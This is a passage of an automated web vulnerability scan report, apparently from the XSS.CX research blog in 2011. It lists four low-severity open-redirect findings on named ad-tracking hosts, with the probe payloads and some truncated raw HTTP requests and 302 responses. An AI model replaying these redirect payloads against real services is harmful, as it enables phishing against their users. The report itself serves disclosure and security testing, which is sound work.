GET /skin/slick-redux/222084 HTTP/1.1 Host: www.winamp.com Proxy-Connection: keep-alive Referer: http://www.winamp.com/ Accept: application/xml User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: UNAUTHID=1.f2ed797a4 |
Response
HTTP/1.1 200 OK Date: Sun, 27 Feb 2011 17:45:35 GMT Server: Apache-Coyote/1.1 Content-Type: text/html;charset=UTF-8 Content-Length: 34378 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org ...[SNIP]... <script type="text/javascript" ...[SNIP]... |
4. Open redirection previous
There are 4 instances of this issue:
- http://r.nexac.com/e/getdata.xgi [ru parameter]
- http://tags.crwdcntrl.net/5/c=25/b=1225394 [name of an arbitrarily supplied request parameter]
- http://tags.crwdcntrl.net/5/c=25/b=1225400 [name of an arbitrarily supplied request parameter]
- http://tags.crwdcntrl.net/5/c=25/b=1226041 [name of an arbitrarily supplied request parameter]
Issue background
Open redirection vulnerabilities arise when an application incorporates user-controllable data into the target of a redirection in an unsafe way. An attacker can construct a URL within the application which causes a redirection to an arbitrary external domain. This behaviour can be leveraged to facilitate phishing attacks against users of the application. The ability to use an authentic application URL, targetting the correct domain with a valid SSL certificate (if SSL is used) lends credibility to the phishing attack because many users, even if they verify these features, will not notice the subsequent redirection to a different domain.4.1. http://r.nexac.com/e/getdata.xgi [ru parameter] previous next
Summary
Severity: | Low |
Confidence: | Certain |
Host: | http://r.nexac.com |
Path: | /e/getdata.xgi |
Issue detail
The value of the ru request parameter is used to perform an HTTP redirect. The payload http%3a//ad8127a7908- http://ad8127a790827d41e
/a?http://ar.atwola.com /atd?it=7&iv=&rand=329065
Request
GET /e/getdata.xgi?dt=br&pkey Host: r.nexac.com Proxy-Connection: keep-alive Referer: http://cdn.at.atwola.com/ Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: na_tc=Y; OAX=rcHW801i4e0ADNVY |
Response
HTTP/1.1 302 Found Expires: Wed Sep 15 09:14:42 MDT 2010 Pragma: no-cache P3P: policyref="http://www Set-Cookie: na_tc=Y; expires=Thu,12-Dec-2030 22:00:00 GMT; domain=.nexac.com; path=/ X-Powered-By: Jigawatts Location: http://ad8127a790827d41e Content-type: text/html Date: Sun, 27 Feb 2011 17:45:09 GMT Server: lighttpd/1.4.18 Content-Length: 1 |
4.2. http://tags.crwdcntrl.net/5/c=25/b=1225394 [name of an arbitrarily supplied request parameter] previous next
Summary
Severity: | Low |
Confidence: | Certain |
Host: | http://tags.crwdcntrl.net |
Path: | /5/c=25/b=1225394 |
Issue detail
The name of an arbitrarily supplied request parameter is used to perform an HTTP redirect. The payload .a2fb1007d6302d504/ was submitted in the name of an arbitrarily supplied request parameter. This caused a redirection to the following URL:- http://.a2fb1007d6302d504
/=1
The application attempts to prevent redirection attacks by prepending an absolute prefix to the user-supplied URL. However, this prefix does not include a trailing slash, so an attacker can add an additional domain name to point to a domain which they control.
Request
GET /5/c=25/b=1225394?.a2fb1007d6302d504/=1 HTTP/1.1 Host: tags.crwdcntrl.net Proxy-Connection: keep-alive Referer: http://www.project Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: aud=ABR4nGNgYGDwzdxy |
Response
HTTP/1.1 302 Moved Temporarily Date: Sun, 27 Feb 2011 02:23:34 GMT Server: Apache/2.2.8 (CentOS) X-Powered-By: Servlet 2.4; JBoss-4.0.4.GA (build: CVSTag=JBoss_4_0_4_GA date=200605151000)/Tomcat Cache-Control: no-cache Expires: 0 Pragma: no-cache P3P: CP=NOI DSP COR NID PSAa PSDa OUR UNI COM NAV Set-Cookie: aud=ABR4nGNgYGDwzdy6 Set-Cookie: cc=ACB4nGNQMEuzsLRIs Location: http://.a2fb1007d6302d504 Vary: Accept-Encoding Connection: close Content-Type: text/plain; charset=UTF-8 Content-Length: 0 |
4.3. http://tags.crwdcntrl.net/5/c=25/b=1225400 [name of an arbitrarily supplied request parameter] previous next
Summary
Severity: | Low |
Confidence: | Certain |
Host: | http://tags.crwdcntrl.net |
Path: | /5/c=25/b=1225400 |
Issue detail
The name of an arbitrarily supplied request parameter is used to perform an HTTP redirect. The payload .af7444b5c923be2c5/ was submitted in the name of an arbitrarily supplied request parameter. This caused a redirection to the following URL:- http://.af7444b5c923be2c5
/=1
The application attempts to prevent redirection attacks by prepending an absolute prefix to the user-supplied URL. However, this prefix does not include a trailing slash, so an attacker can add an additional domain name to point to a domain which they control.
Request
GET /5/c=25/b=1225400?.af7444b5c923be2c5/=1 HTTP/1.1 Host: tags.crwdcntrl.net Proxy-Connection: keep-alive Referer: http://www.project Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: aud=ABR4nGNgYGDwzdxy |
Response
HTTP/1.1 302 Moved Temporarily Date: Sun, 27 Feb 2011 02:23:09 GMT Server: Apache/2.2.8 (CentOS) X-Powered-By: Servlet 2.4; JBoss-4.0.4.GA (build: CVSTag=JBoss_4_0_4_GA date=200605151000)/Tomcat Cache-Control: no-cache Expires: 0 Pragma: no-cache P3P: CP=NOI DSP COR NID PSAa PSDa OUR UNI COM NAV Set-Cookie: aud=ABR4nGNgYGDwzdza Set-Cookie: cc=ACB4nGNQMEuzsLRIs Location: http://.af7444b5c923be2c5 Vary: Accept-Encoding Connection: close Content-Type: text/plain; charset=UTF-8 Content-Length: 0 |
4.4. http://tags.crwdcntrl.net/5/c=25/b=1226041 [name of an arbitrarily supplied request parameter] previous
Summary
Severity: | Low |
Confidence: | Certain |
Host: | http://tags.crwdcntrl.net |
Path: | /5/c=25/b=1226041 |
Issue detail
The name of an arbitrarily supplied request parameter is used to perform an HTTP redirect. The payload .a87ccf957205615f6/ was submitted in the name of an arbitrarily supplied request parameter. This caused a redirection to the following URL:- http://.a87ccf957205615f6
/=1
The application attempts to prevent redirection attacks by prepending an absolute prefix to the user-supplied URL. However, this prefix does not include a trailing slash, so an attacker can add an additional domain name to point to a domain which they control.
Request
GET /5/c=25/b=1226041?.a87ccf957205615f6/=1 HTTP/1.1 Host: tags.crwdcntrl.net Proxy-Connection: keep-alive Referer: http://www.project Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: aud=ABR4nGNgYGDwzdxy |
Response
HTTP/1.1 302 Moved Temporarily Date: Sun, 27 Feb 2011 02:23:36 GMT Server: Apache/2.2.8 (CentOS) X-Powered-By: Servlet 2.4; JBoss-4.0.4.GA (build: CVSTag=JBoss_4_0_4_GA date=200605151000)/Tomcat Cache-Control: no-cache Expires: 0 Pragma: no-cache P3P: CP=NOI DSP COR NID PSAa PSDa OUR UNI COM NAV Set-Cookie: aud=ABR4nGNgYGDwzdy6 Set-Cookie: cc=ACB4nGNQMEuzsLRIs Location: http://.a87ccf957205615f6 Vary: Accept-Encoding Connection: close Content-Type: text/plain; charset=UTF-8 Content-Length: 0 |
Report generated by XSS.CX Research Blog at Mon Feb 28 09:43:09 CST 2011.